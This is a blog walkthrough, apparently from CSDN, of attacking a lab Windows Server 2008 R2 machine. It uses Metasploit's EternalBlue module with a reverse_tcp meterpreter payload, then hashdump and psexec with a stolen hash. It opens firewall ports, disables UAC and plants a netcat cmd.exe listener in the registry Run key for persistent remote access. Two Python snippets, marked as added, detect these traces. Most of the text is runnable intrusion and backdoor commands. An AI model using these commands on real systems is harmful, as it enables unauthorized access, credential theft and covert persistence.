EternalBlue Vulnerability Reproduction and Backdoor Upload

Table of contents

1. Install the target and attacking machines
2. Reproducing EternalBlue
3. Remote desktop login via EternalBlue
4. Problems encountered with remote desktop login
4.1 Password policy
4.2 Remote desktop not supported
5. Turn off host protection policies and open the back door
5.1 View users and passwords
5.2 Create firewall rules
5.3 Turn off UAC
5.4 Enable default sharing
5.5 Use exploit/windows/smb/psexec
5.5.1 A simple understanding of psexec
5.5.2 Specific steps
6. Upload backdoor
6.1 Upload the backdoor program
6.2 Set the registry key value


1. Install the target and attacking machines

First, I installed the target image on a virtual machine (image source: MSDN, I tell you, "a quiet tool station"). I chose Windows Server 2008 R2 here. Remember to select bridged mode when installing the virtual machine, so that your virtual machine is on the same network segment as the physical machine or other virtual machines.

Kali download: Get Kali | Kali Linux (the image can be run directly in a virtual machine).

The attacking machine (Kali) IP is 192.168.3.138

The target machine (Windows Server 2008 R2) IP is 192.168.3.147

2. Reproducing EternalBlue

1. First, find the IP addresses of your target and attacking machines.


2. In Kali, use nmap to scan which ports are open on the target machine; you can see that ports 135, 445 and 4915 are open. This command checks whether the commonly used ports are open.

3. Enter msfdb run to start msf. The banner is different each time, which feels like a little surprise; this time it was a duck.

4. Search for the module: search ms17_010

5. First use the auxiliary module to scan the target machine for the vulnerability. The steps are as follows:

Step 1: load the scanning module: use auxiliary/scanner/smb/smb_ms17_010

Step 2: view which parameters need to be set: show options

Step 3: set the target machine IP: set RHOSTS 192.168.3.147

Step 4: run it: run

If you see "Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)", the target machine is vulnerable to MS17-010.

6. Now use the exploit module to attack.

Step 1: load the exploit module: use exploit/windows/smb/ms17_010_eternalblue

Step 2: view which parameters need to be set: show options

Step 3: set the target machine IP: set RHOSTS 192.168.3.147

There is no need to set the payload, because my Kali sets it automatically. The main settings are the IP address and port of the attacking machine, because a session needs to be established; how can you fall in love without a partner? Change them if your own setup needs it. (In case some people do not have it set up: set payload windows/x64/meterpreter/reverse_tcp. You can use whichever payload you want; list them with show payloads.)

Step 4: run it: run

7. When you see this, the attack has succeeded and a session is established.

3. Remote desktop login via EternalBlue

In Computer - Properties - Advanced System Settings - Remote, you can see that remote connections are not allowed by default. We can make the target machine allow remote connections through a command.


Open port 3389 (the Remote Desktop Protocol port) on the target host by running the module:

run post/windows/manage/enable_rdp

Go back to the system properties of the target machine and you will find that remote connections are now enabled.


If you scan the ports again, you will find that port 3389 is now open.

The next step is the remote login. Logging in requires an account and password, which we can create with the command:

run post/windows/manage/enable_rdp USERNAME=thy PASSWORD=1

Now you can log in to the remote desktop with rdesktop 192.168.3.147 and enter the account name and password.

4. Problems encountered with remote desktop login

4.1 Password policy

This is a problem I ran into while operating. The first is that creating the user always failed. Later I created the user directly on the target machine and it failed too, because of the password complexity requirement in the password policy. You need to disable password complexity; the steps are as follows:

Open gpedit.msc - Windows Settings - Security Settings - Account Policies - Password Policy - disable password complexity.


4.2 Remote desktop not supported

The second thing is that you have to check whether your target machine supports remote desktop connections. What I found on Baidu is that the normal Windows Home edition does not support it. You can see this in the computer properties: when you open the Remote tab, if only the upper part of the page is present and the three options in the lower part are missing, it means it can't be done.

5. Turn off host protection policies and open the back door

5.1 View users and passwords

Use hashdump to list the users and their password hashes; we will need these accounts and hashes later.

5.2 Create firewall rules

Because the firewall is enabled, create a firewall rule that allows port 4444 through, which makes the later operations easier.

The shell command drops into a cmd prompt, where you can run:

netsh firewall add portopening TCP 4444 "thy" ENABLE ALL

5.3 Turn off UAC

UAC works by asking the user whether to authorize an application to modify the hard drive and system files, which helps prevent malicious programs from damaging the system.

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

ADD  adds a registry key
/v   the value name to create
/t   the value type
/d   the data of the value
/f   force overwriting an existing entry

5.4 Enable default sharing

Enable the default shares of the host. Default shares are very convenient for file sharing between hosts, and equally convenient for hackers to use for executing commands remotely.

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Type exit repeatedly until you return to the meterpreter prompt, then type background to keep the session obtained via EternalBlue running in the background.


5.5 Use exploit/windows/smb/psexec

5.5.1 A simple understanding of psexec

psexec is a very good remote command-line tool for Windows. Using psexec does not require the remote host to have port 3389 open; it only needs the admin$ share to be enabled (it is enabled by default). However, if the target host has its firewall enabled, psexec cannot be used and will report that the network path cannot be found. Because psexec is a tool provided by Windows (Microsoft Sysinternals), antivirus software whitelists it.

psexec works like this: it creates a psexec service on the remote target through a named pipe and writes a binary named PSEXESVC to the target's disk; commands are then run through that service, and the service is deleted after the run completes.

Every time psexec executes a remote command, a psexec service is created on the target system and automatically deleted after the command finishes. Because creating and deleting a service generates a lot of log entries, the attack process can be reconstructed from those logs when tracing the source of an attack.

Prerequisites for using psexec:

  • The remote host has the admin$ share enabled; if admin$ is turned off, it prompts: the network name cannot be found.

  • In a workgroup environment you must connect as an administrator user. Connecting as a normal user prompts: Login failed: the user is not granted the requested login type on this computer.

  • In a domain environment, ordinary domain users can connect to ordinary domain hosts, but a domain administrator is required to connect to a domain controller.
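The log trail described above is what an incident responder looks for. The following Python is an added example, not code from the original post: it parses constructed Windows System-log service-install records (Event ID 7045, Service Control Manager) flattened to a key=value line format, and flags a PSEXESVC service, a service binary pulled from the ADMIN$ share, or a binary dropped in the Windows root. The line format, the sample records and the flagging rules are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample of "A service was installed" records (Event ID 7045),
# flattened to key=value per line. Made up for this example, not from the lab.
SAMPLE_EVENTS = """\
EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe StartType=demand start AccountName=LocalSystem
EventID=7045 ServiceName=WinDefend ImagePath=%SystemRoot%\\System32\\svchost.exe -k secsvcs StartType=auto start AccountName=LocalSystem
EventID=7045 ServiceName=gTcQkRsW ImagePath=\\\\127.0.0.1\\ADMIN$\\aXbLqPwz.exe StartType=demand start AccountName=LocalSystem
EventID=7036 ServiceName=PSEXESVC State=stopped
"""

# A value runs until the next " Key=" token, so paths with spaces and
# arguments (svchost.exe -k secsvcs) survive intact.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

@dataclass
class Alert:
    service: str
    image_path: str
    reason: str

def parse_event(line):
    return dict(FIELD_RE.findall(line.strip()))

def classify(event):
    """Why a 7045 record looks like a psexec-style service install, or None."""
    if event.get("EventID") != "7045":
        return None
    name = event.get("ServiceName", "")
    binary = event.get("ImagePath", "").split(" ")[0]   # drop arguments
    directory, _, filename = binary.rpartition("\\")
    if "psexesvc" in (name + filename).lower():
        return "Sysinternals psexec service (PSEXESVC)"
    if "admin$" in directory.lower():
        return "service binary launched from the ADMIN$ share"
    if directory.lower() in ("%systemroot%", "c:\\windows"):
        return "service binary dropped in the Windows root instead of System32"
    return None

def scan(text):
    """Return one Alert per suspicious service-install record in text."""
    alerts = []
    for line in text.splitlines():
        event = parse_event(line)
        reason = classify(event)
        if reason:
            alerts.append(Alert(event["ServiceName"], event.get("ImagePath", ""), reason))
    return alerts
```

Matching only the name PSEXESVC is not enough: the Metasploit module used in 5.5.2 picks a random service name and executable name by default, which is why the ADMIN$ and Windows-root rules are included.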

5.5.2 Specific steps

Step 1: load the psexec module: use exploit/windows/smb/psexec

Step 2: view which parameters need to be set: show options

Step 3: set the target machine IP: set RHOSTS 192.168.3.147

Step 4: set the account name on the target machine: set smbuser thy

Step 5: set the target account's password: set smbpass (the hash value)

Step 6: set the target machine's workgroup: set smbdomain (the workgroup, which can be seen in the computer properties)

Step 7: run it: run

6. Upload backdoor

6.1 Upload the backdoor program

To make the connection persistent, we can upload a backdoor program so that the session can be kept established for a long time. In Kali, our backdoor program nc, commonly known as the Swiss Army knife, is at the following path. We can upload it to the target's C drive.

Upload nc to the Windows folder on the C drive. If you want it to be more concealed, you can upload it to the folder

Open the Windows folder on the target machine and you can see that the file has been uploaded successfully.

6.2 Set the registry key value

When the target machine boots, the program runs in the background and listens on port 443 (you can choose the port yourself).

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

If your firewall does not allow this port, you need to create a new firewall rule allowing port 443 through. You can restart the target machine with the reboot command, then connect with nc -v 192.168.3.147 443.

netsh firewall add portopening TCP 443 "thy" ENABLE ALL
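The three registry changes made in 5.3, 5.4 and 6.2 (EnableLUA=0, LocalAccountTokenFilterPolicy=1, and a Run value that starts a listener) are exactly what a defender should audit a host for. As an added example, not from the original post, the Python below parses a constructed reg export of those two keys and reports each weakened setting together with the hardened value; the export contents and the listener heuristic are assumptions made for this example.

```python
import re

# Constructed .reg export (the format "reg export" writes); values are made up
# for this example and mirror the changes made in sections 5.3, 5.4 and 6.2.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"LocalAccountTokenFilterPolicy"=dword:00000001
"ConsentPromptBehaviorAdmin"=dword:00000005

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"lltest_nc"="C:\\windows\\nc.exe -Ldp 443 -e cmd.exe"
"""

POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# Heuristic for a Run entry that starts a listener: a netcat binary, or "-e <shell>".
LISTENER_RE = re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b|\s-e\s+\S*cmd")

def parse_reg_export(text):
    """Map (key path, value name) -> int for dword values, str for string values."""
    values, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            name, _, rhs = line.partition("=")
            name = name.strip('"')
            if rhs.startswith("dword:"):
                values[(key, name)] = int(rhs[len("dword:"):], 16)
            elif rhs.startswith('"') and rhs.endswith('"'):
                values[(key, name)] = rhs[1:-1].replace("\\\\", "\\")  # unescape \\
    return values

def audit(values):
    """Return human-readable findings for the weakened settings the post applies."""
    findings = []
    if values.get((POLICY_KEY, "EnableLUA")) == 0:
        findings.append("EnableLUA=0: UAC is disabled (hardened value: 1)")
    if values.get((POLICY_KEY, "LocalAccountTokenFilterPolicy")) == 1:
        findings.append("LocalAccountTokenFilterPolicy=1: remote UAC token filtering "
                        "disabled, local admins get full tokens over SMB (hardened: 0 or absent)")
    for (key, name), val in values.items():
        if key == RUN_KEY and isinstance(val, str) and LISTENER_RE.search(val.lower()):
            findings.append(f"Run value {name!r} starts a listener at boot: {val}")
    return findings
```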

The above is my own attack practice; I'm recording it here. Keep going.


Origin blog.csdn.net/dreamthe/article/details/121375464